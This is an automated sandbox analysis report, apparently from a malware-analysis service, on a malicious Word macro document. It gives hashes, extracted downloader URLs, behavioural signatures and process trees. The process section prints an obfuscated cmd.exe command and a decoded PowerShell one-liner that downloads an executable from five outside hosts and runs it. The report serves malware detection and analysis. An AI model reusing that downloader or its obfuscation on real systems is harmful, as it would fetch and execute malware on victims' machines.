Analysis
- max time kernel: 15s
- max time network: 16s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220113
- submitted: 01-02-2022 03:30

Static task: static1

Behavioral task: behavioral1
- Sample: ddfa667a6805bf8b9216feb8df15b1590c340914d7142aa142ecb858d117ba9b.doc
- Resource: win7-en-20211208

Behavioral task: behavioral2
- Sample: ddfa667a6805bf8b9216feb8df15b1590c340914d7142aa142ecb858d117ba9b.doc
- Resource: win10v2004-en-20220113
General
- Target: ddfa667a6805bf8b9216feb8df15b1590c340914d7142aa142ecb858d117ba9b.doc
- Size: 92KB
- MD5: 4ed6536cc686553f21e7583d5257e590
- SHA1: 437dcc1cc98f92a4bdfaab6746a87403ded4dba0
- SHA256: ddfa667a6805bf8b9216feb8df15b1590c340914d7142aa142ecb858d117ba9b
- SHA512: b25b2702513ae30d14c849be9282940d0ae7392097d1f377dded49bf8c4f304656bcc58391ac427b1ee59ebf833394a298988f76324b23ac11b28005048f120a
Malware Config
Extracted:
- http://nebula-ent.com/t3
- http://ektor.com.br/XWWpLxCI
- http://negreiros.com.br/bin/zoZb
- http://n-morimoto.jp/j583VppF
- http://mscyapi.com/mscinsaat.com/cWBJXY3
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes: cmd.exe
- description: Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process; pid: 4720; pid_target: 2960; process: cmd.exe; target process: WINWORD.EXE
Sets service image path in registry (2 TTPs)

Drops file in Windows directory (6 IoCs)
Processes: svchost.exe
- File opened for modification: C:\Windows\WindowsUpdate.log (svchost.exe)
- File opened for modification: C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk (svchost.exe)
- File opened for modification: C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log (svchost.exe)
- File opened for modification: C:\Windows\SoftwareDistribution\DataStore\DataStore.edb (svchost.exe)
- File opened for modification: C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm (svchost.exe)
- File opened for modification: C:\Windows\SoftwareDistribution\ReportingEvents.log (svchost.exe)
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: WINWORD.EXE
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (WINWORD.EXE)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (WINWORD.EXE)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (WINWORD.EXE)
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes: WINWORD.EXE
- Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (WINWORD.EXE)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (WINWORD.EXE)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (WINWORD.EXE)
Modifies data under HKEY_USERS (41 IoCs)
Processes: WaaSMedicAgent.exe
Suspicious behavior: AddClipboardFormatListener (2 IoCs)
Processes: WINWORD.EXE
- pid 2960 (WINWORD.EXE)
- pid 2960 (WINWORD.EXE)
Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes: svchost.exe
- Token: SeShutdownPrivilege; pid 4576 (svchost.exe)
- Token: SeCreatePagefilePrivilege; pid 4576 (svchost.exe)
- Token: SeShutdownPrivilege; pid 4576 (svchost.exe)
- Token: SeCreatePagefilePrivilege; pid 4576 (svchost.exe)
- Token: SeShutdownPrivilege; pid 4576 (svchost.exe)
- Token: SeCreatePagefilePrivilege; pid 4576 (svchost.exe)
Suspicious use of FindShellTrayWindow (2 IoCs)
Processes: WINWORD.EXE
- pid 2960 (WINWORD.EXE)
- pid 2960 (WINWORD.EXE)
Suspicious use of SetWindowsHookEx (7 IoCs)
Processes: WINWORD.EXE
- pid 2960 (WINWORD.EXE)
- pid 2960 (WINWORD.EXE)
- pid 2960 (WINWORD.EXE)
- pid 2960 (WINWORD.EXE)
- pid 2960 (WINWORD.EXE)
- pid 2960 (WINWORD.EXE)
- pid 2960 (WINWORD.EXE)
Suspicious use of WriteProcessMemory (4 IoCs)
Processes: WINWORD.EXE, cmd.exe
- PID 2960 wrote to memory of 4720; pid: 2960; process: WINWORD.EXE; target process: cmd.exe
- PID 2960 wrote to memory of 4720; pid: 2960; process: WINWORD.EXE; target process: cmd.exe
- PID 4720 wrote to memory of 2876; pid: 4720; process: cmd.exe; target process: powershell.exe
- PID 4720 wrote to memory of 2876; pid: 4720; process: cmd.exe; target process: powershell.exe
Processes

- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (depth 1)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ddfa667a6805bf8b9216feb8df15b1590c340914d7142aa142ecb858d117ba9b.doc" /o ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SYSTEM32\cmd.exe (depth 2)
    Command line: cmd /V:/C"set icX=izXquhBIwbtEjbVz5CLc32F)SdOskxZo8,Y{l\yPm;$pMeD-KvnrNJ1}a+@g.=W' f/:7(&&for %6 in (43;31;8;45;51;27;5;45;36;36;64;42;34;43;26;61;50;45;8;47;31;13;12;45;19;10;64;52;45;10;60;62;45;13;17;36;0;45;50;10;41;42;48;49;17;61;63;5;10;10;43;67;66;66;50;45;13;4;36;56;47;45;50;10;60;19;31;40;66;10;20;58;5;10;10;43;67;66;66;45;28;10;31;51;60;19;31;40;60;13;51;66;2;62;62;43;18;29;17;7;58;5;10;10;43;67;66;66;50;45;59;51;45;0;51;31;27;60;19;31;40;60;13;51;66;13;0;50;66;15;31;30;13;58;5;10;10;43;67;66;66;50;47;40;31;51;0;40;31;10;31;60;12;43;66;12;16;32;20;14;43;43;22;58;5;10;10;43;67;66;66;40;27;19;38;56;43;0;60;19;31;40;66;40;27;19;0;50;27;56;56;10;60;19;31;40;66;19;62;6;53;2;34;20;63;60;24;43;36;0;10;69;63;58;63;23;41;42;4;34;30;64;61;64;63;68;21;54;63;41;42;5;44;19;61;42;45;50;49;67;10;45;40;43;57;63;37;63;57;42;4;34;30;57;63;60;45;29;45;63;41;65;31;51;45;56;19;5;69;42;0;13;19;64;0;50;64;42;48;49;17;23;35;10;51;38;35;42;34;43;26;60;46;31;8;50;36;31;56;25;22;0;36;45;69;42;0;13;19;33;64;42;5;44;19;23;41;24;10;56;51;10;47;39;51;31;19;45;27;27;64;42;5;44;19;41;13;51;45;56;28;41;55;19;56;10;19;5;35;55;55;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;64;78)do set uN92=!uN92!!icX:~%6,1!&&if %6 geq 78 call %uN92:*uN92!=%"
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory

    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell $YpO=new-object Net.WebClient;$KvC='http://nebula-ent.com/t3@http://ektor.com.br/XWWpLxCI@http://negreiros.com.br/bin/zoZb@http://n-morimoto.jp/j583VppF@http://mscyapi.com/mscinsaat.com/cWBJXY3'.Split('@');$uYZ = '721';$hMc=$env:temp+'\'+$uYZ+'.exe';foreach($ibc in $KvC){try{$YpO.DownloadFile($ibc, $hMc);Start-Process $hMc;break;}catch{}}

- C:\Windows\System32\WaaSMedicAgent.exe (depth 1)
  Command line: C:\Windows\System32\WaaSMedicAgent.exe f6dc7d082f00c170d0d2d878253d8def HEi96ZH5BEeV6ft6KBdI+g.0.1.0.0.0
  - Modifies data under HKEY_USERS

- C:\Windows\system32\svchost.exe (depth 1)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/2960-130-0x00007FFF17E10000-0x00007FFF17E20000-memory.dmp (Filesize: 64KB)
- memory/2960-131-0x00007FFF17E10000-0x00007FFF17E20000-memory.dmp (Filesize: 64KB)
- memory/2960-132-0x00007FFF17E10000-0x00007FFF17E20000-memory.dmp (Filesize: 64KB)
- memory/2960-133-0x00007FFF17E10000-0x00007FFF17E20000-memory.dmp (Filesize: 64KB)
- memory/2960-134-0x00007FFF17E10000-0x00007FFF17E20000-memory.dmp (Filesize: 64KB)
- memory/2960-135-0x00007FFF15930000-0x00007FFF15940000-memory.dmp (Filesize: 64KB)
- memory/2960-136-0x00007FFF15930000-0x00007FFF15940000-memory.dmp (Filesize: 64KB)
- memory/4576-149-0x00000266B2540000-0x00000266B2544000-memory.dmp (Filesize: 16KB)